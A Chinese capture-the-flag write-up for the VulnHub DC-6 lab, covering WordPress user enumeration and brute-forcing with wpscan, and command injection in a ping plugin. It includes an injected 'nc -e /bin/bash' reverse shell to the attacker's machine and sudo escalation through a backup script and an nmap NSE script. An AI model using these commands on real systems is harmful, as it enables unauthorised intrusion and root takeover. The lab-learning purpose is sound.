vulnhub之DC6靶机

介绍

系列: DC(此系列共10台)
发布日期:2019 年 4 月 26 日
难度:初级-中级
Flag:获取root权限,并拿到唯一的flag
学习:
● wordpress 安全测试
● 本地代码执行
● nmap 提权

靶机地址:https://www.vulnhub.com/entry/dc-6,315/
提示信息:

  • 靶机支持Virtualbox和Vmware
  • 需要修改hosts文件,如:192.168.0.142 wordy
  • 可以通过如下方式获取密码本,提高测试速度:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

信息收集

主机发现

arp-scan主机发现

arp-scan -I eth0 -l

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.40.153,只开放了22和80端口
在这里插入图片描述

访问网站

首先修改hosts文件,打开之后看到是个WordPress站点
在这里插入图片描述

wpscan测试站点

  1. wpscan列出站点的用户名、账号。

发现了一些账号:admin、graham、mark、sarah、jens

wpscan --url http://wordy/ -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

在这里插入图片描述

  1. wpscan漏扫网站,没有发现有价值信息。
wpscan --url http://wordy/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

在这里插入图片描述

  1. wpscan爆破网站

尝试根据得到的用户名,和靶场提示信息中说到的字典,对网站爆破,得到用户名:mark,密码:helpdesk01

准备密码字典:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

准备用户名字典,就是测试出来的那5个用户

开始爆破:
wpscan --url http://wordy -P passwords.txt -U user.txt

在这里插入图片描述

登录站点

登录网站之后,经过简单的搜寻,发现了一个主机ping的测试站点。可以试试有没有经典的命令执行漏洞。最不济也能测试一下“Activity monitor”插件有没有漏洞。
在这里插入图片描述

输入框下面有两个按钮,经过测试,最后一个“Lookup”按钮可以造成命令执行效果
在这里插入图片描述

反弹shell

kali监听:nc -nvlp 9999
反弹命令:127.0.0.1 | nc -e /bin/bash 192.168.40.129 9999
获取交互式shell:python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

信息收集

看到靶机上有4个用户,先去他们的家目录看看
在这里插入图片描述

发现敏感文件,身份切换到 graham 发现存在sudo提权的可能
在这里插入图片描述

提权

身份切换为 jens

思路:发现 graham 可以用 jens 的身份执行 /home/jens/backups.sh,把 /bin/bash追加到这个文件,然后用jens 的身份执行这个文件的时候就会打开一个具有 jens 权限的shell。

/home/jens/backups.sh得知:

  1. 先进入到对应路径:cd /home/jens
  2. /bin/bash追加到这个文件:echo '/bin/bash' >> backups.sh
  3. 切换身份:sudo -u jens ./backups.sh

身份切换之后,发现还可以继续 sudo 提权,提权还真是简单
在这里插入图片描述

提权至root

nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令:
echo 'os.execute("/bin/sh")' > rootshell.nse

以root的权限用nmap执行这个脚本:
sudo nmap --script=rootshell.nse

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值